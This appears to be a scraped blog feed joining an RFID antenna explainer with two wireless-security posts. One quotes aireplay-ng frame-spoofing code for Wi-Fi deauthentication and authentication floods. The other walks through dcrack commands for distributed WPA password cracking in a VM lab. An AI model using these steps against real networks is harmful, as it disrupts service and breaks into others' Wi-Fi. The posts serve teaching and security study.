<a href="http://1.bp.blogspot.com/-CKuOKD52b4Q/VVGedfcWh6I/AAAAAAAACSQ/N1jrix2caKg/s1600/linear-polarization-horizontal.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://1.bp.blogspot.com/-CKuOKD52b4Q/VVGedfcWh6I/AAAAAAAACSQ/N1jrix2caKg/s1600/linear-polarization-horizontal.png" /></a><span style="font-family: inherit;"></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="line-height: 25px;">Linear polarization occurs when electromagnetic waves broadcast on a single plane (either vertical or horizontal). Linear polarized antennas must have a known RFID tag orientation and the RFID tag must be fixed upon the same plane as the antenna in order to get a consistent read. Some examples of linear polarized antennas are the <b>MTI MT-263003 Outdoor Antenna</b>, and the <b>Times-7 A5531 Indoor Antenna</b>. Due to the concentrated emission, linear polarized antennas typically have greater read range than circular polarized antennas of the same gain.</span></span></div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Circular polarized antennas, such as the <b>Laird S9028PCR Indoor RFID Antenna</b> and the <b>MTI MT-242043 Outdoor RFID Antenna</b>, emit electromagnetic fields in a corkscrew-like fashion. Technically speaking, they are broadcasting electromagnetic waves on two planes making one complete revolution in a single wavelength. Compared to linear polarized antennas, circular polarized antennas lose about 3 dB per read because they split their power across two separate planes.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<a href="http://2.bp.blogspot.com/-JIH_ifQllsA/VVGfZ2zIs_I/AAAAAAAACSY/oMkGH6Pnh28/s1600/right-hand-circular-polarization.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-JIH_ifQllsA/VVGfZ2zIs_I/AAAAAAAACSY/oMkGH6Pnh28/s1600/right-hand-circular-polarization.png" /></a><span class="Apple-tab-span" style="white-space: pre;"> </span>Choice of antenna is also determined by the distance between the RFID reader and the tags that it needs to read. <b>This distance is called read range</b>. Reader antennas operate in either a "near-field" (short range) or "far-field" (long range). <b>In</b> <b>near-field applications</b>, the read range is <b>less than 30 cm</b> and the antenna uses magnetic coupling so the reader and tag can transfer power. In near-field systems, the readability of the tags is not affected by the presence of dielectrics such as water and metal in the field.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b>In far-field applications</b>, the range between the tag and reader is <b>greater than 30 cm</b> and can be up to several tens of meters. Far-field antennas utilize electromagnetic coupling and dielectrics can weaken communication between the reader and tags.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><br />
<span style="font-size: large;">Reader Control and Application Software</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Reader control and application software, also known as middleware, helps connect RFID readers with the applications they support. The middleware sends control commands to the reader and receives tag data from the reader.</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
Reference: (See the next part)</div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com1tag:blogger.com,1999:blog-9021539595109195852.post-19124127417122166812013-10-30T12:17:00.000+05:302013-10-30T12:17:11.415+05:30WIRELESS JAMMING !!<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>What is jamming?</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">Jamming is any attack to deny service to legitimate users by generating noise or fake protocol packets or legitimate packets but with spurious timing. A particular class of Denial of Service (DoS) attacks is also considered as jamming. </span><span style="color: #674ea7;">The most trivial way of disrupting a wireless network is by generating a continuous high power noise across the entire bandwidth near the transmitting and/or receiving nodes. The device that generates such a noise is called a <i>Jammer </i>and the process is called <i>Jamming</i>. </span></div>
<div style="text-align: center;">
<span style="color: #674ea7;">However, jamming can be made more energy efficient and less detectable if the jammer operates using knowledge of the protocol. Jammers which jam the network with the knowledge of the protocol, are termed as <i><b>protocol aware jammers</b></i>. </span></div>
<div style="text-align: center;">
<span style="color: #674ea7;">The Wireless Signal Jammer Device can be used to temporarily stop transmission, temporarily short out or turn off the power during the usage of units. These include Radios, Televisions, Microwaves, or any unit that receives electrical signals for operation.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>Is Wireless network secured enough from Jamming?</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b><span style="color: #674ea7;">NO</span></b></div>
<div style="text-align: center;">
<span style="color: #674ea7;"><br /></span></div>
<div style="text-align: center;">
<span style="color: #674ea7;">Since the ratification of the IEEE 802.11i in 2004, organisations have been able to improve security on their wireless networks by making use of CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code protocol). CCMP uses AES (Advanced Encryption Standard) as opposed to the RC4 streaming cipher found in implementations of WEP (Wired Equivalent Privacy) and TKIP (Temporal Key Integrity Protocol). However, the protection offered by 802.11i applies only to data frames and does not provide any protection over the management frames.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>Why am i talking about "Management Frames" ?</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">It is these management frames that are insecure and can lead to DoS attacks against an organisation’s wireless network. Unencrypted management frames can disclose important pieces of information to an attacker, including details about the type of wireless equipment in use on the wireless network and configuration settings.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>What are Management Frames?</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">802.11 management frames enable stations to establish and maintain communications. Management packets are used to support authentication, association, and synchronization.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>Layer 2 DoS (Jamming using Layer 2 [protocol aware jamming] )</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">On an 802.11 network, an attacker can transmit packets using a spoofed source MAC address of an access point. The recipient of these spoofed frames has no way of telling if they are legitimate or illegitimate requests and will process them. The ability to transmit spoofed management frames allows MAC layer DoS attacks to take place. </span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: large;"><b>Two such MAC layer attacks are :</b></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: #cc0000;">Authentication/Association flood attack</span></b><span style="color: #674ea7;"> : During the authentication/association flood attack, an attacker uses spoofed source MAC addresses that attempt to authenticate and associate to a target access point. The attacker repeatedly makes authentication/association requests, eventually exhausting the memory and processing capacity of the access point leaving clients with little or no connection to the wireless network.</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span></div>
<div style="text-align: center;">
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Authentication Packet</b> : Authentication packets are sent back and forth between the station requesting authentication and the station to which it is attempting to assert its authentic identity. The number of packets exchanged depends on the authentication method employed. Information relating to the particular scheme is carried in the body of the Authentication packet.</span></div>
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span>The aireplay-ng source-code defining the Authentication request [Line no. 88 (aireplay-ng.c)]</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #38761d;"><b>#define AUTH_REQ \
"\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
"\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00"</b></span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"><br /></span></span>
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Function(aireplay-ng.c)</b> : do_attack_fake_auth()</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Sample code for "-1" option in aireplay-ng</span><br />
<br />
<span style="color: #674ea7;"> </span><b><span style="color: #38761d;">else if(i==1) </span><span style="color: #b45f06;">//attack -1 (open)</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> {</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> memcpy( h80211, AUTH_REQ, 30 ); </span><span style="color: #b45f06;">//Authentication request data</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> memcpy( h80211 + 4, opt.f_dmac, 6 );</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> memcpy( h80211 + 10, opt.f_smac , 6 );</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> memcpy( h80211 + 16, opt.f_bssid, 6 );</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> opt.f_iswep = 0;</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> opt.f_tods = 0; opt.f_fromds = 0;</span><span style="color: #b45f06;"> // Not Leaving DS</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> opt.f_minlen = opt.f_maxlen = 30;</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> }</span></b><br />
<span style="color: #674ea7;"><br /></span>
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Tools</b> : Void11,mdk3,aireplay-ng etc..</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<div style="text-align: center;">
<span class="Apple-tab-span" style="color: #674ea7; white-space: pre;"> </span><b><span style="color: #cc0000;">Deauthentication/Disassociation flood attacks</span></b><span style="color: #674ea7;"> : In a deauthentication/disassociation flood attack, an attacker transmits spoofed frames with the source address of the access point. When the recipient receives the frames, they will disconnect from the network and attempt to reconnect. If the attack is sustained, the clients will be unable to maintain a connection to the wireless network. The deauthentication/disassociation flood attack targets one or all users on a specific BSSID (MAC address of the access point).</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span></div>
<div style="text-align: center;">
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Deauthentication Packet</b> : This packet is an announcement stating that the receiver is no longer authenticated. It is a one-way communication from the authenticating station (a BSS or functional equivalent), and <b><span style="font-size: large;">must be accepted</span></b>. It takes effect immediately.</span></div>
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span>The aireplay-ng source-code defining the Deauthentication request [Line no. 84 (aireplay-ng.c)]</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<b><span style="color: #38761d;">#define DEAUTH_REQ \</span></b><br />
<blockquote class="tr_bq">
<b><span style="color: #38761d;">"\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \<br />"\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"</span></b><span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span></span></blockquote>
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Function(aireplay-ng.c)</b> : do_attack_deauth()</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Sample code for "-0" option in aireplay-ng</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><br />
<span class="Apple-tab-span" style="color: #674ea7; white-space: pre;"> </span><b><span style="color: #38761d;">if(i==0) </span><span style="color: #b45f06;">//attack -0</span></b><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> {</b></span><br />
<b><span style="color: #38761d;"><span class="Apple-tab-span" style="white-space: pre;"> </span> memcpy( h80211, DEAUTH_REQ, 26 ); </span><span style="color: #b45f06;">// Deauthentication data</span></b><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> memcpy( h80211 + 16, opt.f_bssid, 6 ); </b></span><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> memcpy( h80211 + 4, opt.f_dmac, 6 ); </b></span><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> memcpy( h80211 + 10, opt.f_smac, 6 ); </b></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #38761d;"><b> </b></span></span><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> opt.f_iswep = 0;</b></span><br />
<b><span style="color: #38761d;"><span class="Apple-tab-span" style="white-space: pre;"> </span> opt.f_tods = 0; opt.f_fromds = 0; </span><span style="color: #b45f06;">// Not Leaving DS</span></b><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> opt.f_minlen = opt.f_maxlen = 26; </b></span><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> }</b></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"><b> </b></span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Tools</b> : file2air, mdk3, aireplay-ng etc..</span><br />
<br />
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>Layer 1 DoS (jamming using Layer 1 [RF Noise Jamming] )</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">A physical layer attack on a wired network ideally requires the attacker to be inside or very close to the target wireless network. Any network that relies on a shared medium is subject to DoS attacks from other devices sharing the same medium. When one device saturates the medium, other clients will find it difficult to communicate. </span></div>
<div style="text-align: center;">
<span style="color: #674ea7;">An attacker using a laptop equipped with a high output wireless client card and a high gain antenna can launch a physical medium attack on an organisation’s wireless network by generating enough RF noise to reduce the signal-to-noise ratio to an unusable level by saturating the 802.11 frequency bands. The jamming device could also be a custom built transmitter. For example, a Power Signal Generator (PSG) that is used to test antennas, cables and connectors for wireless devices can be turned into a wireless jamming device, when connected to a high gain antenna. </span></div>
<div style="text-align: center;">
<br /><br /><div style="text-align: justify;">
Phew !!<br />Finally its over. I hope you all like it :-)</div>
<br />Sources and references:<br /><a href="http://networking.ncsu.edu/ThuenteMilcom06_FINAL.pdf">http://networking.ncsu.edu/ThuenteMilcom06_FINAL.pdf</a><br /><a href="http://www.wildpackets.com/resources/compendium/wireless_lan/wlan_packet_types">http://www.wildpackets.com/resources/compendium/wireless_lan/wlan_packet_types</a><br /><a href="https://supportforums.cisco.com/docs/DOC-24651">https://supportforums.cisco.com/docs/DOC-24651</a><br /><a href="http://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108">http://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108</a><br />Wikipedia</div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com0tag:blogger.com,1999:blog-9021539595109195852.post-55645539897296110752013-07-17T22:32:00.000+05:302014-03-18T11:34:28.186+05:30DCRACK - DISTRIBUTED WIRELESS PASSWORD CRACKING<br />
<div style="text-align: center;">
Hello guys,</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
With the New Update from <a href="http://www.aircrack-ng.org/">Aircrack-Suite</a>, its now possible to use others system for the processing power.</div>
<div style="text-align: center;">
(i know that CPU cracking is an old school technique but this tool is really fun :P)</div>
<div style="text-align: center;">
with the new tool introduced in the aircrack suite, <b>dcrack</b> has the ability to perform Wireless Password Cracking in a Distributed Computing Environment. Isn't its COOL !! :D</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
ok then lets see how can we work on <b>dcrack. </b>(i just tired it now but i think its an AWESOME tool !! )</div>
<br />
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Note: I did not test this in a Fully Functioning Lab, I did the testing on VMware Workstation with 4 OS Running ( 1 User, 1 Server, 2 Clients).</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
STEP 1 - INSTALL AIRCRACK SUITE</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Just refer to the aircrack website (<a href="http://www.aircrack-ng.org/install.html">http://www.aircrack-ng.org/install.html</a>) for this.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
STEP 2 - RUN DCRACK</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
To run <b>dcrack</b>, you need to know the working of <b>dcrack</b>. </div>
<div style="text-align: center;">
<br /></div>
<a href="http://3.bp.blogspot.com/-W40rd3Yh4Zo/UeapM6tQBTI/AAAAAAAAAUA/JBHpgq9sYNk/s1600/dcrack.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://3.bp.blogspot.com/-W40rd3Yh4Zo/UeapM6tQBTI/AAAAAAAAAUA/JBHpgq9sYNk/s1600/dcrack.png" /></a><br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As we know now that <b>dcrack</b> utilizes the concept of Distributed Computing, so <b>dcrack</b> need three things :</div>
<div style="text-align: center;">
<br /></div>
<b></b><br />
<div style="text-align: center;">
<b><b>A User</b></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
The User requests the server to crack the wireless password for him/her. The user will send the ".cap" file and a dictionary file (wordlist) to the server for cracking.</div>
<br />
<div style="text-align: center;">
<br /></div>
<b></b><br />
<div style="text-align: center;">
<b><b>A Server</b></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
The server will be used as a Command Center. All the instructions, related to cracking will be given from here. The server will process the user's request for cracking and pass the instructions to the Clients.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<b></b><br />
<div style="text-align: center;">
<b><b>Clients</b></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
Clients are responsible for do the dirty work !!</div>
<div style="text-align: center;">
they use their processing power to crack the password using the wordlist given by the User.</div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
To run <b>dcrack</b>, we need to go to the location where <b>dcrack</b> is located. so now in the terminal we'll go to :</div>
<blockquote class="tr_bq" style="text-align: center;">
<b>/pentest/wireless/aircrack-ng/scripts/</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>First</b>, the server needs to be start. Run the below given command to start the <b>dcrack</b> server. </div>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py server</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-12a0Xz773_4/Ueaw2FibwCI/AAAAAAAAAUQ/t0mcCF3leWw/s1600/dcrack-server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-12a0Xz773_4/Ueaw2FibwCI/AAAAAAAAAUQ/t0mcCF3leWw/s1600/dcrack-server.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
-------------------------------------------------</div>
<br />
<div style="text-align: center;">
NOTE:</div>
<b></b><br />
<div style="text-align: center;">
<b><br /></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
<b><b><span style="color: purple;">DCRACK SERVER IP : 192.168.1.128</span></b></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
<b><span style="color: purple;">CLIENT 1 IP: 192.168.1.131</span></b></div>
<div style="text-align: center;">
<b><span style="color: purple;">CLIENT 2 IP: 192.168.1.133</span></b></div>
<div style="text-align: center;">
<b><span style="color: purple;">USER IP : 192.168.1.132</span></b></div>
<div style="text-align: center;">
<span style="color: purple;"><b>MAC ADDR OF THE AP : </b><b>00:0d:93:eb:b0:8c</b></span></div>
<div style="text-align: center;">
<b>-----------------------------------------------------------</b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b>Second</b>, the user needs to send the .cap file and the wordlist for the cracking to the server.</div>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py cmd 192.168.1.128 cap /root/test.cap</b></blockquote>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py cmd 192.168.1.128 dict /root/password.lst</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-n3L3eRVIinA/UebHTkGvzvI/AAAAAAAAAV8/DOlPOCe_TRE/s1600/dcrack-user.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-n3L3eRVIinA/UebHTkGvzvI/AAAAAAAAAV8/DOlPOCe_TRE/s1600/dcrack-user.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>USER LOG ON SERVER</b> (user sending the files to the server)</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-y7--NV5aZRk/UebHR4qrGXI/AAAAAAAAAVo/6PeXcwsfKA4/s1600/dcrack-server-user.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://3.bp.blogspot.com/-y7--NV5aZRk/UebHR4qrGXI/AAAAAAAAAVo/6PeXcwsfKA4/s1600/dcrack-server-user.png" /></a></div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>NOTE: The wordlist and the .cap file are compressed first to reduce the size to send it over the network. </b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>Third</b>, Both the clients (CLIENT 1 and CLIENT 2) needs to tell the server that its available for cracking. </div>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py client 192.168.1.128</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 1</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-pyjoskyWAHI/UebHPOuO4oI/AAAAAAAAAU4/QJEFHn_RSwI/s1600/dcrack-server-client-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-pyjoskyWAHI/UebHPOuO4oI/AAAAAAAAAU4/QJEFHn_RSwI/s1600/dcrack-server-client-1.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 1 LOG ON SERVER</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-302AUGnuEuE/UebHOZA-9HI/AAAAAAAAAUk/5BPnT8LMJig/s1600/dcrack-server-client-1-log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-302AUGnuEuE/UebHOZA-9HI/AAAAAAAAAUk/5BPnT8LMJig/s1600/dcrack-server-client-1-log.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 2</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-BVXzJD2Jsdo/UebHQp5HDPI/AAAAAAAAAVM/Agx2cC0SpNc/s1600/dcrack-server-client-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-BVXzJD2Jsdo/UebHQp5HDPI/AAAAAAAAAVM/Agx2cC0SpNc/s1600/dcrack-server-client-2.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 2 LOG ON SERVER</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-SKlRJGYJw5E/UebHQrLCZyI/AAAAAAAAAVI/DUXck1oMAMQ/s1600/dcrack-server-client-2-log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-SKlRJGYJw5E/UebHQrLCZyI/AAAAAAAAAVI/DUXck1oMAMQ/s1600/dcrack-server-client-2-log.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Now, the user needs to send the cracking request to the server</div>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py cmd 192.168.1.128 crack 00:0d:93:eb:b0:8c</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-4Yec1rgY38g/UebHR96tu9I/AAAAAAAAAVY/Tz3dh8LLF-c/s1600/dcrack-user-crack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-4Yec1rgY38g/UebHR96tu9I/AAAAAAAAAVY/Tz3dh8LLF-c/s1600/dcrack-user-crack.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>USER LOG ON SERVER</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-XT9-vYkCO-E/UebHR8LxHlI/AAAAAAAAAVg/TsnP6mONxSQ/s1600/dcrack-user-crack-log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-XT9-vYkCO-E/UebHR8LxHlI/AAAAAAAAAVg/TsnP6mONxSQ/s1600/dcrack-user-crack-log.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
Once the user requests the server for cracking, the Clients will start downloading the wordlist and the .cap file from the server. Clients then uncompresses the files and then <b>Splits the Wordlist in 2 parts</b> (as we have 2 clients here) and then starts the cracking using their computing power.</div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
<b>CLIENT 1</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZD3VNKIwqKk/UebHOzS0jOI/AAAAAAAAAUw/EazglpExrAM/s1600/dcrack-server-client-1-cracking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ZD3VNKIwqKk/UebHOzS0jOI/AAAAAAAAAUw/EazglpExrAM/s1600/dcrack-server-client-1-cracking.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 2</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-kTa-3hMOoSs/UebHPbuU-AI/AAAAAAAAAU8/nvfVKt9ogek/s1600/dcrack-server-client-2-cracking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-kTa-3hMOoSs/UebHPbuU-AI/AAAAAAAAAU8/nvfVKt9ogek/s1600/dcrack-server-client-2-cracking.png" /></a></div>
<div style="text-align: center;">
<br /></div>
